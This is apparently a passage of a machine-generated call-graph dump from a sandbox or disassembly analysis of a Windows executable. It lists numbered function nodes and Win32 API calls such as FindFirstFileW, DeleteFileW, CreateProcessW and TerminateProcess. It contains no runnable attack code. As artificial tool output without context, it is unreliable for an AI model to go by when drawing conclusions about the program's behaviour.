98618->98614 98618->98616 98622 b8180 299 API calls 98618->98622 98619->98390 98620->98618 98621->98594 98622->98618 98623->98608 98624->98608 98625->98608 98626->98590 98627->98592 98628->98419 98629->98419 98630->98419 98631->98419 98632->98419 98633->98419 98634->98415 98635->98419 98636->98419 98637->98436 98638->98426 98639->98436 98640->98434 98641->98436 98643 c1207 59 API calls 98642->98643 98644 114024 98643->98644 98645 c1207 59 API calls 98644->98645 98646 11402d 98645->98646 98647 c1207 59 API calls 98646->98647 98648 114036 98647->98648 98666 d0284 98648->98666 98653 11405c 98678 d0119 98653->98678 98654 c1900 59 API calls 98654->98653 98656 114070 FindFirstFileW 98657 1140fc FindClose 98656->98657 98660 11408f 98656->98660 98662 114107 Mailbox 98657->98662 98658 1140d7 FindNextFileW 98658->98660 98659 c1c9c 59 API calls 98659->98660 98660->98657 98660->98658 98660->98659 98661 c17e0 59 API calls 98660->98661 98729 c1900 98660->98729 98661->98660 98662->98443 98665 1140f3 FindClose 98665->98662 98736 e1b70 98666->98736 98669 d02cd 98751 c19e1 98669->98751 98670 d02b0 98742 c1821 98670->98742 98673 d02bc 98738 c133d 98673->98738 98676 114fec GetFileAttributesW 98677 11404a 98676->98677 98677->98653 98677->98654 98679 c1207 59 API calls 98678->98679 98680 d012f 98679->98680 98681 c1207 59 API calls 98680->98681 98682 d0137 98681->98682 98683 c1207 59 API calls 98682->98683 98684 d013f 98683->98684 98685 c1207 59 API calls 98684->98685 98686 d0147 98685->98686 98687 d017b 98686->98687 98688 10627d 98686->98688 98689 c1462 59 API calls 98687->98689 98690 c1c9c 59 API calls 98688->98690 98691 d0189 98689->98691 98692 106286 98690->98692 98693 c1981 59 API calls 98691->98693 98694 c19e1 59 API calls 98692->98694 98695 d0193 98693->98695 98697 d01be 98694->98697 98696 c1462 59 API calls 98695->98696 98695->98697 98699 d01b4 98696->98699 98698 d01fe 98697->98698 98700 d01dd 98697->98700 98711 1062a6 98697->98711 98763 c1462 98698->98763 98702 c1981 59 API calls 98699->98702 98776 c1609 98700->98776 98702->98697 98703 106376 98707 c1821 59 API calls 98703->98707 98705 d020f 98706 d0221 98705->98706 98709 c1c9c 59 API calls 98705->98709 98710 d0231 98706->98710 98712 c1c9c 59 API calls 98706->98712 98718 106333 98707->98718 98709->98706 98714 d0238 98710->98714 98716 c1c9c 59 API calls 98710->98716 98711->98703 98713 10635f 98711->98713 98726 1062dd 98711->98726 98712->98710 98713->98703 98720 10634a 98713->98720 98717 c1c9c 59 API calls 98714->98717 98725 d023f Mailbox 98714->98725 98715 c1462 59 API calls 98715->98698 98716->98714 98717->98725 98718->98698 98719 c1609 59 API calls 98718->98719 98779 c153b 59 API calls 2 library calls 98718->98779 98719->98718 98723 c1821 59 API calls 98720->98723 98721 10633b 98722 c1821 59 API calls 98721->98722 98722->98718 98723->98718 98725->98656 98726->98721 98727 106326 98726->98727 98728 c1821 59 API calls 98727->98728 98728->98718 98730 c1914 98729->98730 98731 ff534 98729->98731 98781 c18a5 98730->98781 98732 c1c7e 59 API calls 98731->98732 98735 ff53f __wsetenvp _memmove 98732->98735 98734 c191f DeleteFileW 98734->98658 98734->98665 98737 d0291 GetFullPathNameW 98736->98737 98737->98669 98737->98670 98739 c134b 98738->98739 98755 c1981 98739->98755 98741 c135b 98741->98676 98743 c182d __wsetenvp 98742->98743 98744 c189a 98742->98744 98746 c1868 98743->98746 98747 c1843 98743->98747 98745 c1981 59 API calls 98744->98745 98750 c184b _memmove 98745->98750 98760 c1c7e 98746->98760 98759 c1b7c 59 API calls Mailbox 98747->98759 98750->98673 98752 c19fb 98751->98752 98754 c19ee 98751->98754 98753 d0fe6 Mailbox 59 API calls 98752->98753 98753->98754 98754->98673 98756 c198f 98755->98756 98757 c1998 _memmove 98755->98757 98756->98757 98758 c1aa4 59 API calls 98756->98758 98757->98741 98758->98757 98759->98750 98761 d0fe6 Mailbox 59 API calls 98760->98761 98762 c1c88 98761->98762 98762->98750 98764 c14ce 98763->98764 98765 c1471 98763->98765 98766 c1981 59 API calls 98764->98766 98765->98764 98767 c147c 98765->98767 98773 c149f _memmove 98766->98773 98768 ff1de 98767->98768 98769 c1497 98767->98769 98770 c1c7e 59 API calls 98768->98770 98780 c1b7c 59 API calls Mailbox 98769->98780 98772 ff1e8 98770->98772 98774 d0fe6 Mailbox 59 API calls 98772->98774 98773->98705 98775 ff208 98774->98775 98777 c1aa4 59 API calls 98776->98777 98778 c1614 98777->98778 98778->98698 98778->98715 98779->98718 98780->98773 98782 c18b4 __wsetenvp 98781->98782 98783 c1c7e 59 API calls 98782->98783 98784 c18c5 _memmove 98782->98784 98785 ff4f1 _memmove 98783->98785 98784->98734 98787 11f8f2 98786->98787 98788 11f898 98786->98788 98862 11fbb7 59 API calls 98787->98862 98789 d0fe6 Mailbox 59 API calls 98788->98789 98791 11f89f 98789->98791 98792 11f8ab 98791->98792 98849 c3df7 60 API calls Mailbox 98791->98849 98794 b4d37 84 API calls 98792->98794 98799 11f8bd 98794->98799 98795 11f8ff 98796 11f9cb 98795->98796 98797 11f8d9 98795->98797 98803 11f93f 98795->98803 98842 118cd0 98796->98842 98797->98448 98850 c3e47 98799->98850 98800 11f9d2 98846 11394d 98800->98846 98805 b4d37 84 API calls 98803->98805 98804 11f8cd 98804->98797 98861 c3f0b CloseHandle 98804->98861 98815 11f946 98805->98815 98807 11f9c1 98823 11399c 98807->98823 98810 c162d 59 API calls 98812 11f98a 98810->98812 98811 c42cf CloseHandle 98813 11fa20 98811->98813 98814 c1c9c 59 API calls 98812->98814 98813->98797 98863 c3f0b CloseHandle 98813->98863 98816 11f994 98814->98816 98815->98807 98819 11f97a 98815->98819 98818 c1900 59 API calls 98816->98818 98820 11f9a2 98818->98820 98819->98810 98821 11399c 66 API calls 98820->98821 98822 11f9ae Mailbox 98821->98822 98822->98797 98822->98811 98824 113a15 98823->98824 98825 1139af 98823->98825 98827 11394d 3 API calls 98824->98827 98825->98824 98826 1139b4 98825->98826 98828 113a09 98826->98828 98830 1139be 98826->98830 98829 1139fd Mailbox 98827->98829 98881 113a35 62 API calls Mailbox 98828->98881 98829->98822 98832 1139de 98830->98832 98834 1139c8 98830->98834 98833 c40cd 59 API calls 98832->98833 98835 1139e6 98833->98835 98867 c40cd 98834->98867 98880 1138e0 61 API calls Mailbox 98835->98880 98839 1139dc 98864 11397e 98839->98864 98843 118cd9 98842->98843 98844 118cde 98842->98844 98884 117d6e 61 API calls 2 library calls 98843->98884 98844->98800 98885 11384c 98846->98885 98848 113959 WriteFile 98848->98822 98849->98792 98851 c42cf CloseHandle 98850->98851 98852 c3e53 98851->98852 98894 c42f9 98852->98894 98854 c3e72 98860 c3e95 98854->98860 98902 c3c61 62 API calls Mailbox 98854->98902 98856 c3e84 98903 c389f 98856->98903 98859 11394d 3 API calls 98859->98860 98860->98795 98860->98804 98861->98797 98862->98795 98863->98797 98865 11394d 3 API calls 98864->98865 98866 113990 98865->98866 98866->98829 98868 d0fe6 Mailbox 59 API calls 98867->98868 98869 c40e0 98868->98869 98870 c1c7e 59 API calls 98869->98870 98871 c40ed 98870->98871 98872 c402a WideCharToMultiByte 98871->98872 98873 c404e 98872->98873 98874 c4085 98872->98874 98875 d0fe6 Mailbox 59 API calls 98873->98875 98883 c3f20 59 API calls Mailbox 98874->98883 98877 c4055 WideCharToMultiByte 98875->98877 98882 c3f79 59 API calls 2 library calls 98877->98882 98879 c4077 98879->98839 98880->98839 98881->98829 98882->98879 98883->98879 98884->98844 98886 113853 98885->98886 98887 11385e 98885->98887 98892 c42ae SetFilePointerEx 98886->98892 98887->98848 98889 1138b8 SetFilePointerEx 98893 c42ae SetFilePointerEx 98889->98893 98891 1138d7 98891->98848 98892->98889 98893->98891 98895 1006fc 98894->98895 98896 c4312 CreateFileW 98894->98896 98897 c4334 98895->98897 98898 100702 CreateFileW 98895->98898 98896->98897 98897->98854 98898->98897 98899 100728 98898->98899 98907 c410a 98899->98907 98902->98856 98904 c38a8 98903->98904 98905 c38b5 98903->98905 98906 c410a 2 API calls 98904->98906 98905->98859 98905->98860 98906->98905 98908 c4124 98907->98908 98909 c41ab SetFilePointerEx 98908->98909 98910 1006cc 98908->98910 98914 c417f 98908->98914 98915 c42ae SetFilePointerEx 98909->98915 98916 c42ae SetFilePointerEx 98910->98916 98913 1006e6 98914->98897 98915->98914 98916->98913 98918 114131 98917->98918 98919 114965 FindFirstFileW 98917->98919 98918->98346 98919->98918 98920 11497a FindClose 98919->98920 98920->98918 98922 b5041 98921->98922 98923 b503c 98921->98923 98922->98457 98923->98922 98983 d37ba 59 API calls 98923->98983 98926 c133d 59 API calls 98925->98926 98927 113f52 GetFileAttributesW 98926->98927 98928 113f66 GetLastError 98927->98928 98931 113f7f Mailbox 98927->98931 98929 113f73 CreateDirectoryW 98928->98929 98930 113f81 98928->98930 98929->98930 98929->98931 98930->98931 98932 c1981 59 API calls 98930->98932 98931->98481 98933 113fc3 98932->98933 98934 113f1d 59 API calls 98933->98934 98935 113fcc 98934->98935 98935->98931 98936 113fd0 CreateDirectoryW 98935->98936 98936->98931 98938 c1207 59 API calls 98937->98938 98939 113cff 98938->98939 98940 c1207 59 API calls 98939->98940 98941 113d07 98940->98941 98942 c1207 59 API calls 98941->98942 98943 113d0f 98942->98943 98944 c1207 59 API calls 98943->98944 98945 113d17 98944->98945 98946 d0284 60 API calls 98945->98946 98947 113d21 98946->98947 98948 d0284 60 API calls 98947->98948 98949 113d2b 98948->98949 98984 114f82 98949->98984 98951 113d36 98952 114fec GetFileAttributesW 98951->98952 98953 113d41 98952->98953 98954 113d53 98953->98954 98955 c1900 59 API calls 98953->98955 98956 114fec GetFileAttributesW 98954->98956 98955->98954 98957 113d5b 98956->98957 98958 113d68 98957->98958 98959 c1900 59 API calls 98957->98959 98960 c1207 59 API calls 98958->98960 98959->98958 98961 113d70 98960->98961 98962 c1207 59 API calls 98961->98962 98963 113d78 98962->98963 98964 d0119 59 API calls 98963->98964 98965 113d89 FindFirstFileW 98964->98965 98966 113eb4 FindClose 98965->98966 98979 113dac Mailbox 98965->98979 98972 113ebe Mailbox 98966->98972 98967 113e88 FindNextFileW 98967->98979 98968 c1a36 59 API calls 98968->98979 98970 c1c9c 59 API calls 98970->98979 98971 c17e0 59 API calls 98971->98979 98972->98465 98973 c1900 59 API calls 98973->98979 98974 11412a 3 API calls 98974->98979 98975 113eab FindClose 98975->98972 98976 113e2a 98980 113e4e MoveFileW 98976->98980 98981 113e3e DeleteFileW 98976->98981 99049 c151f 98976->99049 98977 113ef7 CopyFileExW 98977->98979 98979->98966 98979->98967 98979->98968 98979->98970 98979->98971 98979->98973 98979->98974 98979->98975 98979->98976 98979->98977 98982 113e6b DeleteFileW 98979->98982 98995 114561 98979->98995 98980->98979 98981->98979 98982->98979 98983->98922 98985 c1207 59 API calls 98984->98985 98986 114f97 98985->98986 98987 c1207 59 API calls 98986->98987 98988 114f9f 98987->98988 98989 d0119 59 API calls 98988->98989 98990 114fae 98989->98990 98991 d0119 59 API calls 98990->98991 98992 114fbe 98991->98992 98993 c151f 61 API calls 98992->98993 98994 114fce Mailbox 98993->98994 98994->98951 98996 11457d 98995->98996 98997 114590 98996->98997 98998 114582 98996->98998 99000 c1207 59 API calls 98997->99000 98999 c1c9c 59 API calls 98998->98999 99048 11458b Mailbox 98999->99048 99001 114598 99000->99001 99002 c1207 59 API calls 99001->99002 99003 1145a0 99002->99003 99004 c1207 59 API calls 99003->99004 99005 1145ab 99004->99005 99006 c1207 59 API calls 99005->99006 99007 1145b3 99006->99007 99008 c1207 59 API calls 99007->99008 99009 1145bb 99008->99009 99010 c1207 59 API calls 99009->99010 99011 1145c3 99010->99011 99012 c1207 59 API calls 99011->99012 99013 1145cb 99012->99013 99014 c1207 59 API calls 99013->99014 99015 1145d3 99014->99015 99016 d0119 59 API calls 99015->99016 99017 1145ea 99016->99017 99018 d0119 59 API calls 99017->99018 99019 114603 99018->99019 99020 c1609 59 API calls 99019->99020 99021 11460f 99020->99021 99022 114622 99021->99022 99023 c1981 59 API calls 99021->99023 99024 c1609 59 API calls 99022->99024 99023->99022 99025 11462b 99024->99025 99026 11463b 99025->99026 99028 c1981 59 API calls 99025->99028 99027 c1c9c 59 API calls 99026->99027 99029 114647 99027->99029 99028->99026 99030 c17e0 59 API calls 99029->99030 99031 114653 99030->99031 99052 114713 59 API calls 99031->99052 99033 114662 99053 114713 59 API calls 99033->99053 99035 114675 99036 c1609 59 API calls 99035->99036 99037 11467f 99036->99037 99038 114684 99037->99038 99039 114696 99037->99039 99040 c1900 59 API calls 99038->99040 99041 c1609 59 API calls 99039->99041 99043 114691 99040->99043 99042 11469f 99041->99042 99044 1146bd 99042->99044 99045 c1900 59 API calls 99042->99045 99046 c17e0 59 API calls 99043->99046 99047 c17e0 59 API calls 99044->99047 99045->99043 99046->99044 99047->99048 99048->98979 99054 c14db 99049->99054 99052->99033 99053->99035 99055 c14e9 CompareStringW 99054->99055 99060 ff210 99054->99060 99058 c150c 99055->99058 99057 ff25f 99058->98976 99059 d4eb8 60 API calls 99059->99060 99060->99057 99060->99059 99062 b4d37 84 API calls 99061->99062 99063 12d203 99062->99063 99082 12d24a Mailbox 99063->99082 99099 12de8e 99063->99099 99065 12d4a2 99066 12d617 99065->99066 99070 12d4b0 99065->99070 99150 12dfb1 92 API calls Mailbox 99066->99150 99069 12d626 99069->99070 99072 12d632 99069->99072 99112 12d057 99070->99112 99071 b4d37 84 API calls 99087 12d29b Mailbox 99071->99087 99072->99082 99077 12d4e9 99127 d0e38 99077->99127 99080 12d503 99134 11a48d 89 API calls 4 library calls 99080->99134 99081 12d51c 99135 b47be 99081->99135 99082->98488 99085 12d50e GetCurrentProcess TerminateProcess 99085->99081 99087->99065 99087->99071 99087->99082 99132 11fc0d 59 API calls 2 library calls 99087->99132 99133 12d6c8 61 API calls 2 library calls 99087->99133 99091 12d68d 99091->99082 99095 12d6a1 FreeLibrary 99091->99095 99092 12d554 99147 12dd32 107 API calls _free 99092->99147 99095->99082 99098 12d565 99098->99091 99148 b4230 59 API calls Mailbox 99098->99148 99149 b523c 59 API calls 99098->99149 99151 12dd32 107 API calls _free 99098->99151 99100 c1aa4 59 API calls 99099->99100 99101 12dea9 CharLowerBuffW 99100->99101 99152 10f903 99101->99152 99105 c1207 59 API calls 99106 12dee2 99105->99106 99107 c1462 59 API calls 99106->99107 99108 12def9 99107->99108 99109 c1981 59 API calls 99108->99109 99110 12df05 Mailbox 99109->99110 99111 12df41 Mailbox 99110->99111 99159 12d6c8 61 API calls 2 library calls 99110->99159 99111->99087 99113 12d072 99112->99113 99117 12d0c7 99112->99117 99114 d0fe6 Mailbox 59 API calls 99113->99114 99116 12d094 99114->99116 99115 d0fe6 Mailbox 59 API calls 99115->99116 99116->99115 99116->99117 99118 12e139 99117->99118 99119 12e362 Mailbox 99118->99119 99126 12e15c _strcat _wcscpy __wsetenvp 99118->99126 99119->99077 99120 b502b 59 API calls 99120->99126 99121 b5087 59 API calls 99121->99126 99122 b50d5 59 API calls 99122->99126 99123 b4d37 84 API calls 99123->99126 99124 d593c 58 API calls std::exception::_Copy_str 99124->99126 99126->99119 99126->99120 99126->99121 99126->99122 99126->99123 99126->99124 99160 115e42 61 API calls 2 library calls 99126->99160 99128 d0e4d 99127->99128 99129 d0ee5 CreateProcessW 99128->99129 99130 d0eb3 99128->99130 99131 d0ed3 CloseHandle 99128->99131 99129->99130 99130->99080 99130->99081 99131->99130 99132->99087 99133->99087 99134->99085 99136 b47c6 99135->99136 99137 d0fe6 Mailbox 59 API calls 99136->99137 99138 b47d4 99137->99138 99140 b47e0 99138->99140 99161 b46ec 59 API calls Mailbox 99138->99161 99141 b4540 99140->99141 99162 b4650 99141->99162 99143 d0fe6 Mailbox 59 API calls 99145 b45eb 99143->99145 99144 b454f 99144->99143 99144->99145 99145->99098 99146 b4230 59 API calls Mailbox 99145->99146 99146->99092 99147->99098 99148->99098 99149->99098 99150->99069 99151->99098 99153 10f92e __wsetenvp 99152->99153 99154 10f963 99153->99154 99155 10fa14 99153->99155 99158 10f96d 99153->99158 99156 c14db 61 API calls 99154->99156 99154->99158 99157 c14db 61 API calls 99155->99157 99155->99158 99156->99154 99157->99155 99158->99105 99158->99110 99159->99111 99160->99126 99161->99140 99163 b4659 Mailbox 99162->99163 99164 ed6ec 99163->99164 99169 b4663 99163->99169 99165 d0fe6 Mailbox 59 API calls 99164->99165 99167 ed6f8 99165->99167 99166 b466a 99166->99144 99169->99166 99170 b5190 59 API calls Mailbox 99169->99170 99170->99169 99171->98502 99172->98500 99174 12a970 99173->99174 99175 12a918 99173->99175 99174->98534 99176 d0fe6 Mailbox 59 API calls 99175->99176 99179 12a93a 99176->99179 99177 d0fe6 Mailbox 59 API calls 99177->99179 99179->99174 99179->99177 99205 10715b 59 API calls Mailbox 99179->99205 99181 1178ac 99180->99181 99182 1178e3 99180->99182 99181->99182 99183 d0fe6 Mailbox 59 API calls 99181->99183 99184 106ebc 99182->99184 99183->99182 99185 106f06 99184->99185 99189 106f1c Mailbox 99184->99189 99186 c1a36 59 API calls 99185->99186 99186->99189 99187 106f47 99190 12c355 299 API calls 99187->99190 99188 106f5a 99191 ba820 299 API calls 99188->99191 99189->99187 99189->99188 99196 106f53 99190->99196 99194 106f91 99191->99194 99193 107002 99193->98561 99195 106fdc 99194->99195 99194->99196 99198 106fc1 99194->99198 99195->99196 99211 11a48d 89 API calls 4 library calls 99195->99211 99212 106cf1 59 API calls Mailbox 99196->99212 99206 10706d 99198->99206 99200->98561 99201->98544 99202->98549 99203->98562 99204->98566 99205->99179 99207 107085 99206->99207 99213 12f1b2 99207->99213 99218 12495b 99207->99218 99208 1070d9 99208->99196 99211->99196 99212->99193 99214 b4d37 84 API calls 99213->99214 99215 12f1cf 99214->99215 99216 114148 66 API calls 99215->99216 99217 12f1de 99216->99217 99217->99208 99219 d0fe6 Mailbox 59 API calls 99218->99219 99220 12496c 99219->99220 99227 c433f 99220->99227 99223 b4d37 84 API calls 99224 12498d GetEnvironmentVariableW 99223->99224 99230 117a51 59 API calls Mailbox 99224->99230 99226 1249aa 99226->99208 99228 d0fe6 Mailbox 59 API calls 99227->99228 99229 c4351 99228->99229 99229->99223 99230->99226 99232 114cf0 99231->99232 99233 114d09 99231->99233 99232->99233 99236 114d0f 99232->99236 99237 d385c GetStringTypeW _iswctype 99232->99237 99238 d37c3 59 API calls __wcstoi64 99233->99238 99236->98574 99237->99232 99238->99236 99239 d7e83 99240 d7e8f __commit 99239->99240 99276 da038 GetStartupInfoW 99240->99276 99242 d7e94 99278 d8dac GetProcessHeap 99242->99278 99244 d7eec 99245 d7ef7 99244->99245 99361 d7fd3 58 API calls 3 library calls 99244->99361 99279 d9d16 99245->99279 99248 d7efd 99249 d7f08 __RTC_Initialize 99248->99249 99362 d7fd3 58 API calls 3 library calls 99248->99362 99300 dd802 99249->99300 99252 d7f17 99253 d7f23 GetCommandLineW 99252->99253 99363 d7fd3 58 API calls 3 library calls 99252->99363 99319 e5153 GetEnvironmentStringsW 99253->99319 99256 d7f22 99256->99253 99259 d7f3d 99260 d7f48 99259->99260 99364 d32e5 58 API calls 3 library calls 99259->99364 99329 e4f88 99260->99329 99263 d7f4e 99264 d7f59 99263->99264 99365 d32e5 58 API calls 3 library calls 99263->99365 99343 d331f 99264->99343 99267 d7f61 99268 d7f6c __wwincmdln 99267->99268 99366 d32e5 58 API calls 3 library calls 99267->99366 99349 c5f8b 99268->99349 99271 d7f80 99272 d7f8f 99271->99272 99367 d3588 58 API calls _doexit 99271->99367 99368 d3310 58 API calls _doexit 99272->99368 99275 d7f94 __commit 99277 da04e 99276->99277 99277->99242 99278->99244 99369 d33b7 36 API calls 2 library calls 99279->99369 99281 d9d1b 99370 d9f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 99281->99370 99283 d9d20 99284 d9d24 99283->99284 99372 d9fba TlsAlloc 99283->99372 99371 d9d8c 61 API calls 2 library calls 99284->99371 99287 d9d29 99287->99248 99288 d9d36 99288->99284 99289 d9d41 99288->99289 99373 d8a05 99289->99373 99292 d9d83 99381 d9d8c 61 API calls 2 library calls 99292->99381 99295 d9d88 99295->99248 99296 d9d62 99296->99292 99297 d9d68 99296->99297 99380 d9c63 58 API calls 4 library calls 99297->99380 99299 d9d70 GetCurrentThreadId 99299->99248 99301 dd80e __commit 99300->99301 99302 d9e3b __lock 58 API calls 99301->99302 99303 dd815 99302->99303 99304 d8a05 __calloc_crt 58 API calls 99303->99304 99306 dd826 99304->99306 99305 dd891 GetStartupInfoW 99308 dd8a6 99305->99308 99310 dd9d5 99305->99310 99306->99305 99307 dd831 __commit @_EH4_CallFilterFunc@8 99306->99307 99307->99252 99308->99310 99312 dd8f4 99308->99312 99313 d8a05 __calloc_crt 58 API calls 99308->99313 99309 dda9d 99395 ddaad LeaveCriticalSection _doexit 99309->99395 99310->99309 99314 dda22 GetStdHandle 99310->99314 99315 dda35 GetFileType 99310->99315 99394 da05b InitializeCriticalSectionAndSpinCount 99310->99394 99312->99310 99316 dd928 GetFileType 99312->99316 99393 da05b InitializeCriticalSectionAndSpinCount 99312->99393 99313->99308 99314->99310 99315->99310 99316->99312 99320 d7f33 99319->99320 99321 e5164 99319->99321 99325 e4d4b GetModuleFileNameW 99320->99325 99396 d8a4d 58 API calls 2 library calls 99321->99396 99323 e518a _memmove 99324 e51a0 FreeEnvironmentStringsW 99323->99324 99324->99320 99326 e4d7f _wparse_cmdline 99325->99326 99328 e4dbf _wparse_cmdline 99326->99328 99397 d8a4d 58 API calls 2 library calls 99326->99397 99328->99259 99330 e4fa1 __wsetenvp 99329->99330 99334 e4f99 99329->99334 99331 d8a05 __calloc_crt 58 API calls 99330->99331 99339 e4fca __wsetenvp 99331->99339 99332 e5021 99333 d2f85 _free 58 API calls 99332->99333 99333->99334 99334->99263 99335 d8a05 __calloc_crt 58 API calls 99335->99339 99336 e5046 99337 d2f85 _free 58 API calls 99336->99337 99337->99334 99339->99332 99339->99334 99339->99335 99339->99336 99340 e505d 99339->99340 99398 e4837 58 API calls __commit 99339->99398 99399 d8ff6 IsProcessorFeaturePresent 99340->99399 99342 e5069 99342->99263 99345 d332b __IsNonwritableInCurrentImage 99343->99345 99422 da701 99345->99422 99346 d3349 __initterm_e 99347 d2f70 __cinit 67 API calls 99346->99347 99348 d3368 __cinit __IsNonwritableInCurrentImage 99346->99348 99347->99348 99348->99267 99350 c5fa5 99349->99350 99351 c6044 99349->99351 99352 c5fdf IsThemeActive 99350->99352 99351->99271 99425 d359c 99352->99425 99356 c600b 99437 c5f00 SystemParametersInfoW SystemParametersInfoW 99356->99437 99358 c6017 99438 c5240 99358->99438 99360 c601f SystemParametersInfoW 99360->99351 99361->99245 99362->99249 99363->99256 99367->99272 99368->99275 99369->99281 99370->99283 99371->99287 99372->99288 99374 d8a0c 99373->99374 99376 d8a47 99374->99376 99378 d8a2a 99374->99378 99382 e5426 99374->99382 99376->99292 99379 da016 TlsSetValue 99376->99379 99378->99374 99378->99376 99390 da362 Sleep 99378->99390 99379->99296 99380->99299 99381->99295 99383 e5431 99382->99383 99387 e544c 99382->99387 99384 e543d 99383->99384 99383->99387 99391 d8d58 58 API calls __getptd_noexit 99384->99391 99385 e545c HeapAlloc 99385->99387 99388 e5442 99385->99388 99387->99385 99387->99388 99392 d35d1 DecodePointer 99387->99392 99388->99374 99390->99378 99391->99388 99392->99387 99393->99312 99394->99310 99395->99307 99396->99323 99397->99328 99398->99339 99400 d9001 99399->99400 99405 d8e89 99400->99405 99404 d901c 99404->99342 99406 d8ea3 _memset __call_reportfault 99405->99406 99407 d8ec3 IsDebuggerPresent 99406->99407 99413 da385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99407->99413 99410 d8faa 99412 da370 GetCurrentProcess TerminateProcess 99410->99412 99411 d8f87 __call_reportfault 99414 dc826 99411->99414 99412->99404 99413->99411 99415 dc82e 99414->99415 99416 dc830 IsProcessorFeaturePresent 99414->99416 99415->99410 99418 e5b3a 99416->99418 99421 e5ae9 5 API calls 2 library calls 99418->99421 99420 e5c1d 99420->99410 99421->99420 99423 da704 EncodePointer 99422->99423 99423->99423 99424 da71e 99423->99424 99424->99346 99426 d9e3b __lock 58 API calls 99425->99426 99427 d35a7 DecodePointer EncodePointer 99426->99427 99490 d9fa5 LeaveCriticalSection 99427->99490 99429 c6004 99430 d3604 99429->99430 99431 d360e 99430->99431 99432 d3628 99430->99432 99431->99432 99491 d8d58 58 API calls __getptd_noexit 99431->99491 99432->99356 99434 d3618 99492 d8fe6 9 API calls __commit 99434->99492 99436 d3623 99436->99356 99437->99358 99439 c524d __ftell_nolock 99438->99439 99440 c1207 59 API calls 99439->99440 99441 c5258 GetCurrentDirectoryW 99440->99441 99493 c4ec8 99441->99493 99443 c527e IsDebuggerPresent 99444 c528c 99443->99444 99445 100b21 MessageBoxA 99443->99445 99446 100b39 99444->99446 99447 c52a0 99444->99447 99445->99446 99616 c314d 59 API calls Mailbox 99446->99616 99561 c31bf 99447->99561 99450 100b49 99458 100b5f SetCurrentDirectoryW 99450->99458 99455 c536c Mailbox 99455->99360 99458->99455 99490->99429 99491->99434 99492->99436 99494 c1207 59 API calls 99493->99494 99495 c4ede 99494->99495 99625 c5420 99495->99625 99497 c4efc 99498 c19e1 59 API calls 99497->99498 99499 c4f10 99498->99499 99500 c1c9c 59 API calls 99499->99500 99501 c4f1b 99500->99501 99639 b477a 99501->99639 99504 c1a36 59 API calls 99505 c4f34 99504->99505 99506 b39be 68 API calls 99505->99506 99507 c4f44 Mailbox 99506->99507 99508 c1a36 59 API calls 99507->99508 99509 c4f68 99508->99509 99510 b39be 68 API calls 99509->99510 99511 c4f77 Mailbox 99510->99511 99512 c1207 59 API calls 99511->99512 99513 c4f94 99512->99513 99642 c55bc 99513->99642 99517 c4fae 99518 100a54 99517->99518 99519 c4fb8 99517->99519 99520 c55bc 59 API calls 99518->99520 99521 d312d _W_store_winword 60 API calls 99519->99521 99522 100a68 99520->99522 99523 c4fc3 99521->99523 99525 c55bc 59 API calls 99522->99525 99523->99522 99524 c4fcd 99523->99524 99526 d312d _W_store_winword 60 API calls 99524->99526 99527 100a84 99525->99527 99528 c4fd8 99526->99528 99530 d00cf 61 API calls 99527->99530 99528->99527 99529 c4fe2 99528->99529 99531 d312d _W_store_winword 60 API calls 99529->99531 99532 100aa7 99530->99532 99533 c4fed 99531->99533 99534 c55bc 59 API calls 99532->99534 99535 100ad0 99533->99535 99536 c4ff7 99533->99536 99538 100ab3 99534->99538 99537 c55bc 59 API calls 99535->99537 99539 c501b 99536->99539 99542 c1c9c 59 API calls 99536->99542 99540 100aee 99537->99540 99541 c1c9c 59 API calls 99538->99541 99543 b47be 59 API calls 99539->99543 99544 c1c9c 59 API calls 99540->99544 99545 100ac1 99541->99545 99546 c500e 99542->99546 99547 c502a 99543->99547 99548 100afc 99544->99548 99549 c55bc 59 API calls 99545->99549 99550 c55bc 59 API calls 99546->99550 99551 b4540 59 API calls 99547->99551 99552 c55bc 59 API calls 99548->99552 99549->99535 99550->99539 99553 c5038 99551->99553 99554 100b0b 99552->99554 99658 b43d0 99553->99658 99554->99554 99556 b477a 59 API calls 99558 c5055 99556->99558 99557 b43d0 59 API calls 99557->99558 99558->99556 99558->99557 99559 c55bc 59 API calls 99558->99559 99560 c509b Mailbox 99558->99560 99559->99558 99560->99443 99562 c31cc __ftell_nolock 99561->99562 99563 100314 _memset 99562->99563 99564 c31e5 99562->99564 99566 100330 GetOpenFileNameW 99563->99566 99565 d0284 60 API calls 99564->99565 99567 c31ee 99565->99567 99568 10037f 99566->99568 99678 d09c5 99567->99678 99570 c1821 59 API calls 99568->99570 99572 100394 99570->99572 99572->99572 99574 c3203 99696 c278a 99574->99696 99616->99450 99626 c542d __ftell_nolock 99625->99626 99627 c1821 59 API calls 99626->99627 99633 c5590 Mailbox 99626->99633 99629 c545f 99627->99629 99628 c1609 59 API calls 99628->99629 99629->99628 99638 c5495 Mailbox 99629->99638 99630 c1609 59 API calls 99630->99638 99631 c5563 99632 c1a36 59 API calls 99631->99632 99631->99633 99634 c5584 99632->99634 99633->99497 99636 c4c94 59 API calls 99634->99636 99635 c1a36 59 API calls 99635->99638 99636->99633 99638->99630 99638->99631 99638->99633 99638->99635 99667 c4c94 99638->99667 99640 d0fe6 Mailbox 59 API calls 99639->99640 99641 b4787 99640->99641 99641->99504 99643 c55df 99642->99643 99644 c55c6 99642->99644 99646 c1821 59 API calls 99643->99646 99645 c1c9c 59 API calls 99644->99645 99647 c4fa0 99645->99647 99646->99647 99648 d312d 99647->99648 99649 d31ae 99648->99649 99650 d3139 99648->99650 99675 d31c0 60 API calls 3 library calls 99649->99675 99657 d315e 99650->99657 99673 d8d58 58 API calls __getptd_noexit 99650->99673 99652 d31bb 99652->99517 99654 d3145 99674 d8fe6 9 API calls __commit 99654->99674 99656 d3150 99656->99517 99657->99517 99659 ed6c9 99658->99659 99666 b43e7 99658->99666 99659->99666 99677 b40cb 59 API calls Mailbox 99659->99677 99661 b44ef 99661->99558 99662 b44e8 99665 d0fe6 Mailbox 59 API calls 99662->99665 99663 b4530 99676 b523c 59 API calls 99663->99676 99665->99661 99666->99661 99666->99662 99666->99663 99668 c4ca2 99667->99668 99672 c4cc4 _memmove 99667->99672 99671 d0fe6 Mailbox 59 API calls 99668->99671 99669 d0fe6 Mailbox 59 API calls 99670 c4cd8 99669->99670 99670->99638 99671->99672 99672->99669 99673->99654 99674->99656 99675->99652 99676->99661 99677->99666 99679 e1b70 __ftell_nolock 99678->99679 99680 d09d2 GetLongPathNameW 99679->99680 99681 c1821 59 API calls 99680->99681 99682 c31f7 99681->99682 99683 c2f3d 